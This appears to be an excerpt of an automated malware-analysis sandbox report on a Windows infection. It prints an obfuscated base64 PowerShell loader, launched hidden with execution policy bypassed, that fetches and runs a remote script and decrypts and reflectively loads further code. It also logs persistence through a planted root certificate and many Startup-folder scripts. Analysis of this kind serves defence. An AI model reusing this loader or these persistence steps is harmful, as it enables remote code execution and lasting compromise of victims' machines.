"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00404C9D LoadLibraryA,GetProcAddress,18_2_00404C9D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C92D45 push eax; iretd 10_2_04C92ED9
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C92EB5 push eax; iretd 10_2_04C92ED9
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C92E5D push eax; iretd 10_2_04C92ED9
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C9107B push eax; ret 10_2_04C91172
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C9107B push eax; ret 10_2_04C91182
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C91158 push eax; ret 10_2_04C91162
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C91168 push eax; ret 10_2_04C91172
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C91178 push eax; ret 10_2_04C91182
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C91118 push eax; ret 10_2_04C91142
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C91118 push eax; ret 10_2_04C91152
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C97CE1 pushfd ; iretd 10_2_04C97CE2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0764C35C push esp; ret 10_2_0764C35D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07643818 push E871807Eh; iretd 10_2_0764381D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00414060 push eax; ret 18_2_00414074
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00414060 push eax; ret 18_2_0041409C
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00414039 push ecx; ret 18_2_00414049
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmd\:Zone.Identifier:$DATAJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d6f97d4.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d6f97d4.cmd\:Zone.Identifier:$DATAJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_afc64e18.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_afc64e18.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_30ab010e.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_30ab010e.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a3290096.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a3290096.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5e045579.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5e045579.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2a427d4.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2a427d4.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2674f34.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2674f34.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9de4acd0.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9de4acd0.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a71a70f4.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a71a70f4.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_69a99999.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_69a99999.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3f24aa5d.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3f24aa5d.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a0b1d30.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a0b1d30.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_406c4ae3.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_406c4ae3.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b50e3cba.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b50e3cba.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1b9b8043.cmd
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1b9b8043.cmd\:Zone.Identifier:$DATA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
